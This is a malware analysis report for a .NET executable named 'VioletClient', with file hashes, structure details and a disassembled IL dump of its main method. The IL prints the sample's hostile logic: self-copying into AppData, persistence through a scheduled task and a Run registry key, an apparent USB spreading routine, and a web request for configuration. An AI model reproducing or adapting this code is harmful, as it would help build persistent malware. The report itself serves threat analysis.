Suspicious
Suspect

a344e6c30ee71eccc82f879911d7f5a8

PE Executable | MD5: a344e6c30ee71eccc82f879911d7f5a8 | Size: 1.48 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
a344e6c30ee71eccc82f879911d7f5a8
Sha1
9a02d1e4e5bdae37eba8b981085a1819f0f6790c
Sha256
95565b3507424e5c24ea032e13d214ba62969df25c41c878eaf833453cf28a25
Sha384
a402c7911e913489c9bec394d5d08baa63bc0137087a1feb64d8de6169372732fa8c673234ff4bc313d6d92de21dd178
Sha512
21589385e0a7414c7871d324884b9ea6ab99f32da22cfc4e124aa395a9443f77ae5d5de050494a13eb1c8ff62dc4c3162b3ef7a10db0376e5b0e025209092725
SSDeep
12288:qz9ZYOJ4eAj/bJCnO6RzVAD0LZSKoO3dZsZrp4jUAaBMPDCmES1OvcPhvBWZUzvh:07sbMx104BloHepgAH17aBiCi
TLSH
91659B2868BB506D9573FF617EDCB9EADDDE2E522509645B1081370B8932F80EE4383D

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

microsoft

Full Name

microsoft

EntryPoint

System.Void HFEoaJWs.SQZRSFuwQGc::QtCqpLoCn8Ofz3kseiHq()

Scope Name

microsoft

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

VioletClient

Assembly Version

7.13.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

453

Main Method

System.Void HFEoaJWs.SQZRSFuwQGc::QtCqpLoCn8Ofz3kseiHq()

Main IL Instruction Count

278

Main IL

call System.Void HFEoaJWs.IRFCHIznjtC::PMVDhtOuXZdZHGnOfUhz() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void HFEoaJWs.FVOUDHXDSaTjaD::AEdjhbp1cmsAp14J7N5H() call System.Boolean HFEoaJWs.GEEUUDkftnj::3eglCiYjeO0zhbTiGmxX() brtrue IL_0024: ldc.i4.3 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.3 <null> stloc.3 <null> ldc.i4.4 <null> stloc.s V_4 ldloc.3 <null> ldloc.s V_4 add.ovf <null> stloc.s V_5 ldloc.s V_5 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_6 ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ ldloc.s V_6 call System.Void System.IO.File::Copy(System.String,System.String) ldloc.s V_6 newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) leave IL_0094: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0094: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) stloc.0 <null> ldloc.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() 
ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ ldloc.1 <null> call System.Void System.IO.File::Copy(System.String,System.String) leave IL_00F7: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_00F7: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr c2NodGFza3MuZXhl call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_11 ldloc.s V_11 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.s V_11 ldc.i4.5 <null> newarr System.String stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr L2NyZWF0ZSAvZiAvc2MgbWludXRlIC9tbyAxIC90biAi call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.1 <null> ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_21 ldc.i4.2 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr IiAvdHIgIg== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String 
System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_21 ldc.i4.4 <null> nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Ig== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stelem.ref <null> ldloc.s V_21 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_11 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_10 ldloc.s V_10 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_01B6: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01B6: nop nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr YXBwZGF0YQ== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.String Microsoft.VisualBasic.Interaction::Environ(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr XA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileName(System.String) call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_13 call My.MyComputer My.MyProject::Iw87DgrmaA4ZcHEKA79V() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey 
Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.s V_13 callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) ldsfld System.String HFEoaJWs.ApWMp::pQeq9TOYc2RVFWRHpXsJ ldloc.s V_13 call System.Void System.IO.File::Copy(System.String,System.String) leave IL_0254: ldsfld HFEoaJWs.USB HFEoaJWs.ApWMp::H6Qb84SeTH6tYEfDCrct dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0254: ldsfld HFEoaJWs.USB HFEoaJWs.ApWMp::H6Qb84SeTH6tYEfDCrct ldsfld HFEoaJWs.USB HFEoaJWs.ApWMp::H6Qb84SeTH6tYEfDCrct callvirt System.Void HFEoaJWs.USB::N17MedRUunLcjHN98QUZ() ldsfld System.Boolean HFEoaJWs.ApWMp::aP11RIXiv8seyrkKzu7L brfalse IL_03AE: ldnull ldc.i4 4032 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldsfld System.String HFEoaJWs.ApWMp::wWfCxdjwcgEEyFJmWuUE call System.Net.WebRequest System.Net.WebRequest::Create(System.String) castclass System.Net.HttpWebRequest stloc.s V_15 ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr R0VU call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_Method(System.String) 
ldloc.s V_15 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr TW96aWxsYS81LjA= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Void System.Net.HttpWebRequest::set_UserAgent(System.String) ldloc.s V_15 callvirt System.Net.WebResponse System.Net.HttpWebRequest::GetResponse() castclass System.Net.HttpWebResponse stloc.s V_16 ldloc.s V_16 callvirt System.IO.Stream System.Net.HttpWebResponse::GetResponseStream() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream) stloc.s V_17 ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 br IL_035B: ldloc.s V_18 ldloc.s V_18 call System.Boolean System.String::IsNullOrWhiteSpace(System.String) brtrue IL_0352: ldloc.s V_17 ldloc.s V_18 nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldstr Og== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.String System.Text.Encoding::GetString(System.Byte[]) callvirt System.Boolean System.String::Contains(System.String) brfalse IL_0352: ldloc.s V_17 ldloc.s V_18 ldc.i4.1 <null> newarr System.Char stloc.s V_22 ldloc.s V_22 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_22 ldc.i4.2 <null> callvirt System.String[] System.String::Split(System.Char[],System.Int32) stloc.s V_19 ldloc.s V_19 ldlen <null> conv.ovf.i4 <null> ldc.i4.2 <null> bne.un IL_0352: ldloc.s V_17 ldloc.s V_19 ldc.i4.0 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String HFEoaJWs.ApWMp::biMy4FwTUMhZEwPzAB1y ldloc.s V_19 ldc.i4.1 <null> ldelem.ref <null> callvirt System.String System.String::Trim() stsfld System.String HFEoaJWs.ApWMp::xCyXfE5Vv00FgpVUvsxC ldloc.s V_17 callvirt System.String System.IO.StreamReader::ReadLine() stloc.s V_18 ldloc.s V_18 brtrue IL_02E5: ldloc.s V_18 leave IL_0376: leave IL_038A ldloc.s V_17 brfalse IL_0375: endfinally ldloc.s 
V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_038A: leave IL_03AE ldloc.s V_16 brfalse IL_0389: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_03AE: ldnull dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 ldloc.s V_20 callvirt System.String System.Exception::get_Message() call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String) pop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_03AE: ldnull ldnull <null> ldftn System.Void HFEoaJWs.SQZRSFuwQGc::pAOkR3pk50PZWdsQukH7() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>

Characteristics
No malware configuration was found at this point.